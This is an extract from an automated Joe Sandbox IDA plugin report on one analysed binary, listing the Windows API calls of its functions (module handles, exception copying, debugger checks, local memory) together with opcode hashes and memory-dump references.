                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                • String ID: pCF
                                • API String ID: 3761405300-4015737121
                                • Opcode ID: 8c6622a5dd56ee4636118929f4a62706778da63d7aff81bae41b78bcc0ad66f2
                                • Instruction ID: 77e48fb440844a68c40b68c4872e5a1cb5d0995b7edbaa33ed3ce5318b60968c
                                • Opcode Fuzzy Hash: 8c6622a5dd56ee4636118929f4a62706778da63d7aff81bae41b78bcc0ad66f2
                                • Instruction Fuzzy Hash: EA21CFB4611204DEEB14CF65F9467407BA8BB89314F11413AE9088B3A1FBF59885CF5E
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,A05DD77D), ref: 003FC624
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: ntdll.dll$unknown
                                • API String ID: 4139908857-665686941
                                • Opcode ID: f556089a122ef55d57a58c15a6626e72c1d6ee81e0fef4d39472a1cc6be404da
                                • Instruction ID: 5201d3559591e050eb923b4bdb92d6baef7d7a6ca3c341813ab87e4b5e617296
                                • Opcode Fuzzy Hash: f556089a122ef55d57a58c15a6626e72c1d6ee81e0fef4d39472a1cc6be404da
                                • Instruction Fuzzy Hash: B3112B71E5410CDBDB01DF64DC42BBFB778EB04B04F14812AE911AB781EB79A904C795
                                APIs
                                • GetModuleHandleW.KERNEL32(winhttp.dll,A05DD77D), ref: 003FBCD4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: unknown$winhttp.dll
                                • API String ID: 4139908857-1431162475
                                • Opcode ID: b332a0c159b23d6f8f90c71b5db0e309c969d211aef4c31b29da3acf485318d4
                                • Instruction ID: 9a18ccbe1448cbc336181fc0496615f2f01f01ee90a1b31c831c69a55861f01a
                                • Opcode Fuzzy Hash: b332a0c159b23d6f8f90c71b5db0e309c969d211aef4c31b29da3acf485318d4
                                • Instruction Fuzzy Hash: AB1108B1E4414CDBDB01DF64DC42BBFB778EB04B04F10812AF9116B681EB79A904C795
                                APIs
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003EDCD8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InterruptPreciseQueryTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: ICommunicator::send_message$framework
                                • API String ID: 58087820-3514916642
                                • Opcode ID: d30d0b6fbd71c6956d8d1d868a7132a79fa90d816636d5ea78341d4c42e78959
                                • Instruction ID: 450e53189016732778ed02a3e493acc35696e93a6c1280d65888556e8f27bbf6
                                • Opcode Fuzzy Hash: d30d0b6fbd71c6956d8d1d868a7132a79fa90d816636d5ea78341d4c42e78959
                                • Instruction Fuzzy Hash: B8F0596264031436E224692E9C0BFB3378DCBC5B20F10066A7E48572C2D9D4AC0082E4
                                APIs
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E9B79
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InterruptPreciseQueryTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: framework$invoke_rpc
                                • API String ID: 58087820-3532104870
                                • Opcode ID: 35d3e8ac11e5e5da4afa325ccd85d2b134debd955c6c9de94058398bd859a6b5
                                • Instruction ID: dc6429e73ec58920d59cc1072fb07726c261df71c11d6cf2f9daab72ba0e6056
                                • Opcode Fuzzy Hash: 35d3e8ac11e5e5da4afa325ccd85d2b134debd955c6c9de94058398bd859a6b5
                                • Instruction Fuzzy Hash: A0F05562A8021436E320697A9C0BF63378C8FC1B20F14069BBE589B1C2D8E86D00C3E8
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E8453
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: 0q>$@ >
                                • API String ID: 2659868963-3763285519
                                • Opcode ID: 85afc7fe0f5afb3adac00c1918e4492c616389490010d3d39002be5345a2560f
                                • Instruction ID: 64673ceac7a804d7a160df5410aeb3033292a5e7d7cf5777b35964ab58de1c50
                                • Opcode Fuzzy Hash: 85afc7fe0f5afb3adac00c1918e4492c616389490010d3d39002be5345a2560f
                                • Instruction Fuzzy Hash: C4F09074E107089FC710DF69D84189AFBF8EF49300F50C6AFE85597300EBB4AA588B99
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E6C02
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: !7B$@ >
                                • API String ID: 2659868963-3301268938
                                • Opcode ID: ecfe851d1484a8688aeaebb8fdfb7efc282cb451faf8c9f408223e3f980c2c56
                                • Instruction ID: 2fe7e49d5b9a9b25b2c0f3e8065fb725355238da25f90f08629731fe561d3ff9
                                • Opcode Fuzzy Hash: ecfe851d1484a8688aeaebb8fdfb7efc282cb451faf8c9f408223e3f980c2c56
                                • Instruction Fuzzy Hash: 88F0A731E1020C9BC704DF68D8419CEBBF8AF45304F10C2AFE80167201EA755A548799
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E730F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: 0q>$@ >
                                • API String ID: 2659868963-3763285519
                                • Opcode ID: 05d941ef53d462873975e1fa981d67e689de12c7a1a14ded9787310021d8f5f4
                                • Instruction ID: da10a28e3f21c782899f63defb19d8d5fde899da183c63407a36bc5460bd3c24
                                • Opcode Fuzzy Hash: 05d941ef53d462873975e1fa981d67e689de12c7a1a14ded9787310021d8f5f4
                                • Instruction Fuzzy Hash: DFE039B6A10709AB8300DF59D840882F7FCFE5A220341C62BEA2897B00E774B464CBA4
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E85EF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: 0q>$@ >
                                • API String ID: 2659868963-3763285519
                                • Opcode ID: 5019d2892725dfb811bf9fd3d90e4747bbdd62d547bdadcc542366282c2ea6ff
                                • Instruction ID: c9b1122a1f35bd95282739bc2493be2eb6716243d9fa31891a444fee401fca84
                                • Opcode Fuzzy Hash: 5019d2892725dfb811bf9fd3d90e4747bbdd62d547bdadcc542366282c2ea6ff
                                • Instruction Fuzzy Hash: 89E0C9B6A10715AB8700DF59D841882F7FCFE59220355C62BE62997B00E774B5648BA4
                                APIs
                                  • Part of subcall function 003EF030: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,00459524), ref: 003EF035
                                  • Part of subcall function 003EF030: GetLastError.KERNEL32(?,00000000,00000000,?,00459524), ref: 003EF03F
                                • IsDebuggerPresent.KERNEL32(?,?,?,003E1FC9), ref: 00426A1E
                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003E1FC9), ref: 00426A2D
                                Strings
                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00426A28
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                • API String ID: 3511171328-631824599
                                • Opcode ID: 65f33f26a6db08d99b2c6fe6bb1994bdc53e25431f4c44bc6679d25eff84ddc0
                                • Instruction ID: 883e57b26eabf31d68a45ce296dce20434e75f24fa0b86e3e4f431959c77e0b0
                                • Opcode Fuzzy Hash: 65f33f26a6db08d99b2c6fe6bb1994bdc53e25431f4c44bc6679d25eff84ddc0
                                • Instruction Fuzzy Hash: 66E06D742013608FE3319F69F504302BBE4AF05748F40892EE582D6250EBB8E5948BA5
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLocal$ErrorLast
                                • String ID:
                                • API String ID: 4216857709-0
                                • Opcode ID: fa539d1f5cd324f904f95c12804c2b7d48a804ee4c81017b8535fd93bedec44f
                                • Instruction ID: 0d287ce7217dc1159d2a50744cc41786edbb1b1b40467c61cf42e74c9c36ee79
                                • Opcode Fuzzy Hash: fa539d1f5cd324f904f95c12804c2b7d48a804ee4c81017b8535fd93bedec44f
                                • Instruction Fuzzy Hash: 29B1AA70E003589FEB10DFA5D844BAEBBF0AF49304F54405EE805AB392DB79AD44CB99
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E210E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 2659868963-3421840758
                                • Opcode ID: 45ab66b51f53d26006f39ee78bc52e79836726de6e1ff3c14cc9799c366a7585
                                • Instruction ID: 4456deb5c31d52426f7c40a86eef2a97722c946152a24af6b6488e42313a9da1
                                • Opcode Fuzzy Hash: 45ab66b51f53d26006f39ee78bc52e79836726de6e1ff3c14cc9799c366a7585
                                • Instruction Fuzzy Hash: 85D0C27292031457D2009F98EC00882B7EC9E16214341C62BF744E7200F774A49043A8
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E863E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 2659868963-3421840758
                                • Opcode ID: 8546db6b54f7b65daf4397cd024479c76794b616364b5fade9bb64b279734381
                                • Instruction ID: e36e2aa74de4d35524dde683f726677c6e3b9b714e9be7c69f7355190b312239
                                • Opcode Fuzzy Hash: 8546db6b54f7b65daf4397cd024479c76794b616364b5fade9bb64b279734381
                                • Instruction Fuzzy Hash: 41D0C27292031457C600DF98DC00882B7ECDE15654300C52BF244E7200F774E4908BA8
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 00400ACE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 2659868963-3421840758
                                • Opcode ID: 655726da94c4d8270a65e7ed0ab5ef38903b8572c309a74b62f89cd14c1bd5fb
                                • Instruction ID: 411f450d1d9332060aeab2ac8929895ccb771d65fef5f2377f051ae9d1907be2
                                • Opcode Fuzzy Hash: 655726da94c4d8270a65e7ed0ab5ef38903b8572c309a74b62f89cd14c1bd5fb
                                • Instruction Fuzzy Hash: 5BD0C7B2A203185BC600AF99EC40982B7EC9E1A354304C22BF244E7200F7B4E89087A8
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E6E4E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 2659868963-3421840758
                                • Opcode ID: 88f7a87d2698ab7bcb35b391f0ee55fac310e15a4db82439607f70f1dd3a99ea
                                • Instruction ID: 44927ec5f728db342b9b739ebffb1759ac43ee2102e94046d342731ebefc64c9
                                • Opcode Fuzzy Hash: 88f7a87d2698ab7bcb35b391f0ee55fac310e15a4db82439607f70f1dd3a99ea
                                • Instruction Fuzzy Hash: A6D0C27292031457C2109F98DC00882B7ECDE16254340C52BF644E7200F774E8A047E8
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0040884B
                                • GetLastError.KERNEL32 ref: 00408855
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorHandleLastModule
                                • String ID: ntdll.dll
                                • API String ID: 4242514867-2227199552
                                • Opcode ID: 36aba62ce95fc604c19e062d8ad298f6fc6990d57f78acf7fe0b79ec32909e4b
                                • Instruction ID: 063a34c65c2bcc900477c2604e5754f2802607d79655bad9e81b9a3e01d15dcc
                                • Opcode Fuzzy Hash: 36aba62ce95fc604c19e062d8ad298f6fc6990d57f78acf7fe0b79ec32909e4b
                                • Instruction Fuzzy Hash: FDD0A726B552080389103BB63C4B62533188602615F0407BDED5C913C1FD36843082CF
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLocal$ErrorLast
                                • String ID:
                                • API String ID: 4216857709-0
                                • Opcode ID: a11ec400a907a9f4136231dba04edd9796b3098bd08b2c25c50d051bd195dce6
                                • Instruction ID: 977ef9ae6c92403bda78f69477bcbb262c8bb68f59bbedeed1c7d49d5dd57e07
                                • Opcode Fuzzy Hash: a11ec400a907a9f4136231dba04edd9796b3098bd08b2c25c50d051bd195dce6
                                • Instruction Fuzzy Hash: E1B1CE70E00358CFEB14CFA4D844BAEBBF1AF05300F54405AE855AB392D779AD44CB59
                                APIs
                                • GetLastError.KERNEL32 ref: 0042028E
                                • LocalAlloc.KERNEL32(00000000,00000000), ref: 004202BF
                                • GetLastError.KERNEL32 ref: 00420300
                                • LocalFree.KERNEL32(00000000), ref: 0042031B
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
